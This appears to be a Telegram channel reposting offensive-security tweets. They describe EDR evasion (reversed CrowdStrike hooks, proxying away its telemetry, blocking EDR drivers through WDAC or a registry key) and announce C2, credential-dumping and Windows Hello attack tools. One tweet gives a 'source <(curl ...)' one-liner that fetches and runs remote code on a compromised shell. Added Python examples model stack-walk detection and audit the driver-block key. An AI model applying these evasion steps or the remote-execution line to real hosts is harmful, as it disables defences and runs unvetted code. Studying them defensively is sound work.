Offensive Xwitter – Telegram
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
😈 [ Chetan Nayak (Brute Ratel C4 Author) @NinjaParanoid ]

Got a question from a BruteRatel operator in the BRC4 discord channel as to what the newly implemented csxumd64_xxxxx.dll module in Crowdstrike does. So, here's my little explanation post reversing it.

Crowdstrike implants 3 DLLs in their latest version - umppcxxxxx.dll, csxumd64_xxxxx.dll and umpdc.dll. UMPPC is the main usermode DLL which hooks into various NTAPI. UMPDC is more focused towards ADDC related attacks. Maybe another tweet on this later. But the CSXUMD64 (or Extended User Mode Data Module as CS likes to call it) is mainly responsible for analyzing the call stacks of various API calls, as well as a few new thread pool hooks such as CreateThreadPoolWork, maybe to check for loaded libraries or similar. The callstacks are analyzed only when a certain set of conditions are hit. Here's a walkthrough of the Callstack which I've labelled and explained:

Image 1: Hooked API call (CreateThreadPoolWork in combase.dll) jumps to csxumd64
Image 2: csxumd64 saves the registers to stack before calling RtlAddVectoredExceptionHandler. This API call enables VEH hooking for an internal function of csxumd64 (rdx register)
Image 3: VEH function checks a few arguments and if the profile fits, it will jump to another internal function
Image 4: This function calls RtlCaptureContext to get register and stack information about the thread which called the hooked API in Image 1 (CreateThreadPoolWork). Now here...

a. RtlCaptureContext returns a pointer to a CONTEXT structure which has the current thread metadata required to walk the stack.
b. The return address captured from the CONTEXT structure is passed on to RtlLookupFunctionEntry which returns a pointer to RUNTIME_FUNCTION structure containing the unwind data for the stack.
c. This unwind data is then verified against the output from API RtlVirtualUnwind to check if the callstack is being backed to disk. If this is not backed, VEH is removed and the process is killed using ZwTerminateProcess API.

Crowdstrike mentions in their documentation that this module captures additional data, but can incur greater performance penalties, which does make sense, as VEH and stack tracing can seriously affect process performance when done on a large scale. However, what is extremely dumb here is, that they are not performing ETWTI stack tracing from the Kernel like ATP/Elastic or FortiEDR to avoid being simply unhooked from the userland. Wondering if I should release the tool to simply undo all the hooks that CS has placed, or just let it play out. :D

There's a lot more that happens within these three DLLs which I've incorporated in my v1.8 release for BRC4, and will also be discussing some of them in the January 2024 Malware On Steroids workshop.

🐥 [ tweet ]
🔥7👍6
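The three steps in the post above (capture the context, look up the unwind data for the function containing the return address, virtually unwind frame by frame and check whether each return address is backed by an image on disk) are easier to reason about with a small model in front of you. The following is an added Python simulation written for this page; it is not CrowdStrike's code and not Brute Ratel code. The module map, unwind table, stack contents and every address are constructed for the example, and a fixed frame size per function stands in for real UNWIND_INFO parsing. The point it shows from the defender's side is what the check actually keys on: a return address that falls in private, non-file-backed memory.

```python
"""Simplified model of a user-mode call-stack check (added example, constructed data).

Stand-ins used here:
  lookup_function_entry  -> RtlLookupFunctionEntry / RUNTIME_FUNCTION
  virtual_unwind         -> RtlVirtualUnwind (one frame per call)
  ImageRegion.backed_by_file -> "is this return address inside a mapped PE image?"
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ImageRegion:
    name: str
    base: int
    size: int
    backed_by_file: bool  # True for a mapped PE image, False for private memory

    def contains(self, address: int) -> bool:
        return self.base <= address < self.base + self.size


@dataclass(frozen=True)
class RuntimeFunction:
    """Code range plus the distance from RSP (inside the body) to the return-address slot."""
    begin: int
    end: int
    frame_size: int


# Constructed process layout; all addresses are made up for the example.
REGIONS: List[ImageRegion] = [
    ImageRegion("combase.dll", 0x7FF8_0000_0000, 0x10_0000, True),
    ImageRegion("ntdll.dll", 0x7FF9_0000_0000, 0x20_0000, True),
    ImageRegion("app.exe", 0x0040_0000, 0x1_0000, True),
    ImageRegion("<private RWX>", 0x2000_0000, 0x1000, False),  # allocated at runtime, no file
]

# Constructed unwind table (one entry per function we expect to see on the stack).
UNWIND_TABLE: List[RuntimeFunction] = [
    RuntimeFunction(0x7FF8_0000_1000, 0x7FF8_0000_1100, 0x28),  # combase: the hooked API
    RuntimeFunction(0x0040_1000, 0x0040_1200, 0x38),            # app.exe: legitimate caller
    RuntimeFunction(0x2000_0000, 0x2000_0400, 0x48),            # code living in private memory
    RuntimeFunction(0x7FF9_0001_0000, 0x7FF9_0001_0100, 0x28),  # ntdll: thread start routine
]

Frame = Tuple[int, str, bool]  # (rip, region name, backed_by_file)


def lookup_function_entry(rip: int) -> Optional[RuntimeFunction]:
    """Return the unwind record covering rip, or None (unknown/leaf code)."""
    return next((rf for rf in UNWIND_TABLE if rf.begin <= rip < rf.end), None)


def region_for(address: int) -> Optional[ImageRegion]:
    return next((r for r in REGIONS if r.contains(address)), None)


def virtual_unwind(rip: int, rsp: int, stack: Dict[int, int]) -> Optional[Tuple[int, int]]:
    """One unwind step: read the caller's return address from the stack, return (rip, rsp)."""
    rf = lookup_function_entry(rip)
    if rf is None:
        return None
    slot = rsp + rf.frame_size
    if slot not in stack:
        return None  # ran off the simulated stack
    return stack[slot], slot + 8


def walk_stack(rip: int, rsp: int, stack: Dict[int, int], max_frames: int = 32) -> List[Frame]:
    """Walk from the captured context outward, classifying each frame's return address."""
    frames: List[Frame] = []
    while len(frames) < max_frames:
        region = region_for(rip)
        frames.append((rip, region.name if region else "<unmapped>", bool(region and region.backed_by_file)))
        step = virtual_unwind(rip, rsp, stack)
        if step is None:
            break
        rip, rsp = step
    return frames


def unbacked_frames(frames: List[Frame]) -> List[Frame]:
    """Frames whose return address is not inside a file-backed image: the detection signal."""
    return [f for f in frames if not f[2]]


def benign_stack() -> Tuple[int, int, Dict[int, int]]:
    # hooked API <- app.exe <- ntdll thread start (constructed stack memory: slot -> qword)
    return 0x7FF8_0000_1010, 0x1000, {0x1028: 0x0040_1050, 0x1068: 0x7FF9_0001_0020}


def suspicious_stack() -> Tuple[int, int, Dict[int, int]]:
    # hooked API <- private RWX memory <- ntdll thread start
    return 0x7FF8_0000_1010, 0x2000, {0x2028: 0x2000_0100, 0x2078: 0x7FF9_0001_0020}


if __name__ == "__main__":
    for label, case in (("benign", benign_stack), ("suspicious", suspicious_stack)):
        frames = walk_stack(*case())
        for rip, name, backed in frames:
            print(f"{label:10} {rip:#018x} {name:14} {'image' if backed else 'UNBACKED'}")
        print(f"{label}: {'would be flagged' if unbacked_frames(frames) else 'passes'}")
```

The walk stops when the unwind table has no record for the current address or the return-address slot is missing; a production implementation additionally has to handle leaf functions, unwind chains and frames with dynamic stack adjustments, which is where much of the "performance penalty" the post mentions comes from. Because the entire check runs inside the monitored process, its result is only as trustworthy as the hooks that trigger it, which is the author's point about kernel-sourced stack traces.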
😈 [ Chetan Nayak (Brute Ratel C4 Author) @NinjaParanoid ]

Now that the cat's out of the bag, let me state that I've been exploiting the last part (IE Proxy modification) in my last few Red team engagements to deploy a local proxy via BOF which blocks all Crowdstrike traffic and only allows the ones I've whitelisted 😛. Here's a quick snapshot to identify Crowdstrike traffic (cloudsink.net) via local socks proxy 🫢. Might post its BOF later, unless someone beats me to it.

🐥 [ tweet ]

(A comment regarding that BSOD analysis by 360)
👍6🔥1
😈 [ SpecterOps @SpecterOps ]

Do you like BloodHound & PowerShell? Do you want to automate all things BloodHound?

Check out @SadProcessor's new blog post diving into a new PowerShell module he created, & instructions on how to get started ⤵️

🔗 https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156020b7c5e9
🔗 https://github.com/SadProcessor/BloodHoundOperator

🐥 [ tweet ]
🔥3🥱2
😈 [ Cube0x0 @cube0x0 ]

Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.

Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments:

🔗 https://0xc2.io

The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services.

All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.

More details will be available soon.

🐥 [ tweet ]
👍9🔥1
😈 [ Nic Losby @ DEFCON @Blurbdust ]

And a small update, generation is over halfway and will actually finish! A release of a torrent should be out before the end of the year!

🐥 [ tweet ][ reply ]

(about those very crack.sh rainbow tables 🏳️‍🌈)
👍5🤯3
😈 [ Michael Schwarz @misc0110 ]

With the #GhostWrite CPU vulnerability, all isolation boundaries are broken - sandbox/container/VM can't prevent GhostWrite from writing and reading arbitrary physical memory on affected RISC-V CPUs. Deterministic, fast, and reliable - no side channels.

🔗 https://ghostwriteattack.com/

🐥 [ tweet ]
😢4
😈 [ Daniel @0x64616e ]

Lol, blocking the loading of EDR drivers with WDAC actually works.

🐥 [ tweet ][ quote ]
😁9👍5
😈 [ CCob🏴󠁧󠁢󠁷󠁬󠁳󠁿 @_EthicalChaos_ ]

Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week 🙈

🔗 https://github.com/CCob/Shwmae

🐥 [ tweet ]
🔥6
😈 [ Orange Tsai 🍊 @orange_8361 ]

Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!

Highlights include:
Escaping from DocumentRoot to System Root
Bypassing built-in ACL/Auth with just a '?'
Turning XSS into RCE with legacy code

🔗 https://blog.orange.tw/2024/08/confusion-attacks-en.html

🐥 [ tweet ]
👍8🥱6🔥4🤔1
😈 [ Ricardo Ruiz @RicardoJoseRF ]

Last week I made public TrickDump, a tool to dump lsass using only NTAPIS without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:

🔗 https://github.com/ricardojoserf/TrickDump

🐥 [ tweet ]
🔥9🥱3
😈 [ OtterHacker @OtterHacker ]

I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!

🔗 https://github.com/OtterHacker/Conferences/tree/main/Defcon32

🐥 [ tweet ]
🔥7👍2🥱1
😈 [ Bad Sector Labs @badsectorlabs ]

Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with

We've found credentials, certificates, custom apps, keystores, etc. What will you find?

🔗 https://github.com/badsectorlabs/sccm-http-looter

🐥 [ tweet ]
🔥6
😈 [ klez @KlezVirus ]

[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)

🔗 https://github.com/klezVirus/DriverJack
🔗 https://github.com/klezVirus/RpcProxyInvoke
🔗 https://github.com/klezVirus/koppeling-p

🐥 [ tweet ]
👍7🔥2
😈 [ Dirk-jan @_dirkjan ]

At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.

Slides:
🔗 https://dirkjanm.io/talks/

PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion

🐥 [ tweet ]
🔥3
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]

RELEASE:
This should be the 1st command you execute on a remote shell 🧨

source <(curl -SsfL https://thc.org/hs)


Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).

LEAVES NO TRACE (memory only).

🔗 https://github.com/hackerschoice/hackshell

🐥 [ tweet ]
👍15🔥4
😈 [ Daniel @0x64616e ] Lol, blocking the loading of EDR drivers with WDAC actually works. 🐥 [ tweet ][ quote ]
😈 [ Yarden Shafir @yarden_shafir ]

Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.

🐥 [ tweet ][ quote ]
👍13
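From the defensive side, the registry value named in the post above is worth auditing: on a healthy host it is normally absent, so any entry naming a security product's driver deserves investigation. The following is an added Python example written for this page (not the author's tooling). It parses the `hex(7)` REG_MULTI_SZ encoding that `reg export` writes, so the check can run offline over an exported hive or a collected `.reg` file. The key path `HKLM\SYSTEM\CurrentControlSet\Control\CI\Config` is taken as an assumption here, and the sample export, the driver names and the list of "own" drivers are all constructed.

```python
"""Audit HVCIDisallowedImages in a .reg export (added example, constructed sample data)."""
from typing import List, Optional, Set

# Assumed location of the value; verify against your own reference host.
CI_CONFIG_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CI\Config"
VALUE_NAME = "HVCIDisallowedImages"

# Constructed sample in `reg export` format. REG_MULTI_SZ is written as hex(7):
# UTF-16LE bytes, NUL between strings, double NUL at the end, lines continued with '\'.
# Decodes to: "edr_agent.sys", "sensor.sys" (placeholder driver names).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CI\Config]
"HVCIDisallowedImages"=hex(7):65,00,64,00,72,00,5f,00,61,00,67,00,65,00,6e,00,\
  74,00,2e,00,73,00,79,00,73,00,00,00,73,00,65,00,6e,00,73,00,6f,00,72,00,2e,\
  00,73,00,79,00,73,00,00,00,00,00
'''


def parse_reg_multi_sz(reg_text: str, key: str, value_name: str) -> Optional[List[str]]:
    """Return the strings of a hex(7) value under `key`, or None if the value is absent."""
    lines = reg_text.splitlines()
    in_key = False
    prefix = f'"{value_name}"=hex(7):'
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("["):
            in_key = line.strip().lower() == f"[{key}]".lower()
        elif in_key and line.startswith(prefix):
            payload = line[len(prefix):]
            # Gather continuation lines (trailing backslash means "value continues").
            while payload.rstrip().endswith("\\") and i + 1 < len(lines):
                payload = payload.rstrip()[:-1]
                i += 1
                payload += lines[i].strip()
            raw = bytes(int(tok, 16) for tok in payload.split(",") if tok.strip())
            return [s for s in raw.decode("utf-16-le").split("\x00") if s]
        i += 1
    return None


def flag_security_drivers(listed: List[str], own_drivers: Set[str]) -> List[str]:
    """Names in the value that match drivers you expect to be loaded (case-insensitive)."""
    wanted = {d.lower() for d in own_drivers}
    return [name for name in listed if name.lower() in wanted]


def audit(reg_text: str, own_drivers: Set[str]) -> str:
    listed = parse_reg_multi_sz(reg_text, CI_CONFIG_KEY, VALUE_NAME)
    if listed is None:
        return "HVCIDisallowedImages not present (expected on a healthy host)"
    hits = flag_security_drivers(listed, own_drivers)
    return f"listed={listed} flagged={hits}"


if __name__ == "__main__":
    # Constructed: the driver names a defender would consider their own protection stack.
    print(audit(SAMPLE_REG, {"sensor.sys"}))
```

Pair the offline parser with monitoring for writes to that value (registry auditing or a Sysmon RegistryEvent rule on the key path), because the post notes the block only takes effect after a reboot, which leaves a window in which the change is visible before it has any effect.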